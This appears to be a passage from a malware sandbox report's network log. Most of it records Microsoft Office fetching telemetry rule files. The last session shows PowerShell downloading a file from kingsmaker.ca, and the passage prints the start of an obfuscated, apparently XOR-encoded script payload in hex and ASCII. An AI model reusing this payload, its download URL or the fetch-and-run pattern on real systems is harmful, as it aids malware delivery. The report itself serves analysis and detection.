                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120614" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            18192.168.2.54972613.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:44 UTC192OUTGET /rules/rule120612v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:44 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:44 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 471
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:25 GMT
                                                                                                                            ETag: "0x8DC582BB10C598B"
                                                                                                                            x-ms-request-id: f4f389a9-e01e-0020-2c00-42de90000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073044Z-174f784596886s2bhC1EWR743w0000000zp0000000004p2t
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:44 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120612" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            19192.168.2.54972713.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:44 UTC192OUTGET /rules/rule120613v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:44 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:44 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 632
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                            ETag: "0x8DC582BB6E3779E"
                                                                                                                            x-ms-request-id: 6f96f590-e01e-0099-0e7f-3fda8a000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073044Z-174f7845968l4kp6hC1EWRe8840000000zw00000000049wg
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:44 UTC632INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 48 68 5d 5b 50 70 5d 28 5b 5e 45 5d 7c 24 29 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 33 22 20 52 3d 22 28 5b 48 68 5d 5b 45 65 5d 5b 57 77 5d 5b 4c 6c 5d 5b 45 65 5d
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120613" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120611" /> <SR T="2" R="^([Hh][Pp]([^E]|$))"> <S T="1" F="1" M="Ignore" /> </SR> <SR T="3" R="([Hh][Ee][Ww][Ll][Ee]


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            20192.168.2.54972513.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:44 UTC192OUTGET /rules/rule120611v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:44 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:44 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 415
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:56 GMT
                                                                                                                            ETag: "0x8DC582B9F6F3512"
                                                                                                                            x-ms-request-id: f5d49257-301e-005d-758c-3fe448000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073044Z-174f7845968pf68xhC1EWRr4h80000000zxg000000002dpa
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:44 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 30 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4c 6c 5d 5b 45 65 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 56 76 5d 5b 4f 6f 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120611" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120609" /> <SR T="2" R="([Ll][Ee][Nn][Oo][Vv][Oo])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            21192.168.2.54973013.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:46 UTC192OUTGET /rules/rule120615v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:46 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:46 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 407
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                            ETag: "0x8DC582BBAD04B7B"
                                                                                                                            x-ms-request-id: ed9dfa2a-401e-0015-7891-3f0e8d000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073046Z-174f7845968qj8jrhC1EWRh41s0000000zhg000000005d6d
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:46 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 53 73 5d 5b 55 75 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120615" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120613" /> <SR T="2" R="([Aa][Ss][Uu][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            22192.168.2.54973213.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:46 UTC192OUTGET /rules/rule120617v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:46 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:46 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 427
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:02 GMT
                                                                                                                            ETag: "0x8DC582BA310DA18"
                                                                                                                            x-ms-request-id: cce54a11-701e-006f-7509-42afc4000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073046Z-174f7845968glpgnhC1EWR7uec0000000zs0000000006u18
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:46 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120617" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo][Ss][Oo][Ff][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            23192.168.2.54973113.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:46 UTC192OUTGET /rules/rule120616v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:46 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:46 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 486
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                                                                                                                            ETag: "0x8DC582BB344914B"
                                                                                                                            x-ms-request-id: 6eac52fb-a01e-006f-2191-3f13cd000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073046Z-174f7845968glpgnhC1EWR7uec0000000zng00000000cmb4
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:46 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120616" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120615" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            24192.168.2.54973313.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:46 UTC192OUTGET /rules/rule120618v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:46 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:46 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 486
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:30 GMT
                                                                                                                            ETag: "0x8DC582B9018290B"
                                                                                                                            x-ms-request-id: d1d63a80-401e-0047-5645-408597000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073046Z-174f78459685m244hC1EWRgp2c0000000zd0000000007d32
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:46 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120618" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                            25192.168.2.54973413.107.246.63443
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:46 UTC192OUTGET /rules/rule120619v0s19.xml HTTP/1.1
                                                                                                                            Connection: Keep-Alive
                                                                                                                            Accept-Encoding: gzip
                                                                                                                            User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                            Host: otelrules.azureedge.net
                                                                                                                            2024-11-29 07:30:46 UTC470INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:46 GMT
                                                                                                                            Content-Type: text/xml
                                                                                                                            Content-Length: 407
                                                                                                                            Connection: close
                                                                                                                            Cache-Control: public, max-age=604800, immutable
                                                                                                                            Last-Modified: Tue, 09 Apr 2024 00:25:41 GMT
                                                                                                                            ETag: "0x8DC582B9698189B"
                                                                                                                            x-ms-request-id: ff98645e-b01e-0001-1091-3f46e2000000
                                                                                                                            x-ms-version: 2018-03-28
                                                                                                                            x-azure-ref: 20241129T073046Z-174f7845968kdththC1EWRzvxn0000000c2g0000000008ne
                                                                                                                            x-fd-int-roxy-purgeid: 0
                                                                                                                            X-Cache: TCP_HIT
                                                                                                                            Accept-Ranges: bytes
                                                                                                                            2024-11-29 07:30:46 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 31 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 43 63 5d 5b 45 65 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                                                                            Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120619" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120617" /> <SR T="2" R="([Aa][Cc][Ee][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                            26192.168.2.549740104.21.75.1704437368C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                            2024-11-29 07:30:49 UTC388OUTGET /file2/37e2a576781f60eaea55e379be6ae0077641b39f5907924d8524241e29b7a53a613b3d37f90e005e11b96d6117629046990c1df79aa9735289308c1b2fa9edeea4dc5fe5a09bf9b2773eeaf90950b696fe10cc9db3745b5151e4b000a791213cf93f25070f589b40fd3e39c4a18edad2 HTTP/1.1
                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                                                            Host: kingsmaker.ca
                                                                                                                            Connection: Keep-Alive
                                                                                                                            2024-11-29 07:30:50 UTC1121INHTTP/1.1 200 OK
                                                                                                                            Date: Fri, 29 Nov 2024 07:30:49 GMT
                                                                                                                            Content-Type: application/octet-stream
                                                                                                                            Content-Length: 12118
                                                                                                                            Connection: close
                                                                                                                            content-disposition: attachment; filename=image; filename*=UTF-8''image
                                                                                                                            CF-Cache-Status: DYNAMIC
                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4f7D19msq55GGSmvFkxmTd2uJqMNwLo9C62TL58ntAePFlvZLiV9QPUjHS4edpqth%2Bjowc8l9e1bAd83bg%2BKy%2BN%2Fa1KMdcAQl%2BBL6miqn20CvJUDzN21%2F8WGepYwaRpyhMYmkdvA9FQ5"}],"group":"cf-nel","max_age":604800}
                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=45181&min_rtt=1013&rtt_var=22676&sent=19564&recv=9557&lost=0&retrans=0&sent_bytes=27519239&recv_bytes=291547&delivery_rate=47135761&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                                                            X-Powered-By: ARR/3.0
                                                                                                                            Server: cloudflare
                                                                                                                            CF-RAY: 8ea0e5026f178c57-EWR
                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2012&min_rtt=2007&rtt_var=764&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=1002&delivery_rate=1421616&cwnd=212&unsent_bytes=0&cid=7df3e8787fdbaf5c&ts=1035&x=0"
                                                                                                                            2024-11-29 07:30:50 UTC248INData Raw: 25 67 75 66 75 76 62 66 75 3c 5a 52 78 72 75 64 6c 2f 55 64 79 75 2f 44 6f 62 6e 65 68 6f 66 5c 3b 3b 40 52 42 48 48 2f 46 64 75 52 75 73 68 6f 66 29 5a 52 78 72 75 64 6c 2f 42 6e 6f 77 64 73 75 5c 3b 3b 47 73 6e 6c 43 60 72 64 37 35 52 75 73 68 6f 66 29 23 65 6c 4b 71 4e 59 47 6b 4c 6b 6d 30 52 56 71 7b 55 6a 4f 6f 4c 44 75 4b 50 31 47 6f 52 54 4f 52 63 30 71 59 53 6c 75 60 56 44 71 37 57 32 6d 52 62 6d 71 58 63 46 53 4b 53 45 43 6f 52 6a 69 60 60 46 4b 48 57 6c 79 51 65 7b 43 4d 52 54 4f 43 5b 31 6d 45 54 6b 47 6b 63 56 75 6f 54 47 4f 43 60 56 47 48 54 6b 43 6b 52 44 31 33 55 49 6a 34 62 6c 47 59 4f 56 34 6b 4c 6b 47 6e 58 55 4b 56 64 54 79 75 55 6c 69 4c 64 6d 4b 70 56 56 30 53 4c 6a 30 37 5b 46 69 4f 57 46 69 70 56 57 53 6b 4c 31
                                                                                                                            Data Ascii: %gufuvbfu<ZRxrudl/Udyu/Dobnehof\;;@RBHH/FduRushof)ZRxrudl/Bnowdsu\;;GsnlC`rd75Rushof)#elKqNYGkLkm0RVq{UjOoLDuKP1GoRTORc0qYSlu`VDq7W2mRbmqXcFSKSECoRji``FKHWlyQe{CMRTOC[1mETkGkcVuoTGOC`VGHTkCkRD13UIj4blGYOV4kLkGnXUKVdTyuUliLdmKpVV0SLj07[FiOWFipVWSkL1
                                                                                                                            2024-11-29 07:30:50 UTC1369INData Raw: 30 44 60 46 79 51 53 44 30 35 56 57 65 47 65 31 38 49 53 6c 6d 4f 57 44 4b 6e 55 57 53 53 65 30 71 54 54 59 65 4f 4c 6d 54 78 56 6c 30 46 60 31 34 54 50 55 47 4e 57 46 72 78 56 6d 53 57 64 54 30 75 52 6c 75 4e 53 47 6a 76 56 57 53 57 4f 57 6d 70 54 6c 6d 4e 60 6d 6a 76 55 30 53 5b 65 31 30 37 54 6c 71 51 53 47 44 79 56 6c 30 60 60 54 30 37 58 7b 4b 5b 57 47 57 32 55 30 65 60 60 30 6d 54 5b 46 30 4e 4c 6a 5b 71 55 55 4b 53 64 47 71 45 52 55 65 44 54 56 38 6f 52 54 4f 43 5b 33 47 59 56 56 38 4a 53 33 53 7b 58 6b 4b 4a 60 46 4b 44 62 47 43 56 4c 54 34 56 54 57 5b 4a 52 30 57 72 56 6d 47 4c 63 59 69 72 58 6c 30 6a 4c 46 47 45 50 59 53 60 4c 30 47 6f 55 54 4f 73 55 6a 4f 71 50 56 65 4b 50 31 48 32 53 47 47 77 5b 31 6d 45 50 56 65 4b 50 31 47 6f 52 54 4f 52 63
                                                                                                                            Data Ascii: 0D`FyQSD05VWeGe18ISlmOWDKnUWSSe0qTTYeOLmTxVl0F`14TPUGNWFrxVmSWdT0uRluNSGjvVWSWOWmpTlmN`mjvU0S[e107TlqQSGDyVl0``T07X{K[WGW2U0e``0mT[F0NLj[qUUKSdGqERUeDTV8oRTOC[3GYVV8JS3S{XkKJ`FKDbGCVLT4VTW[JR0WrVmGLcYirXl0jLFGEPYS`L0GoUTOsUjOqPVeKP1H2SGGw[1mEPVeKP1GoRTORc
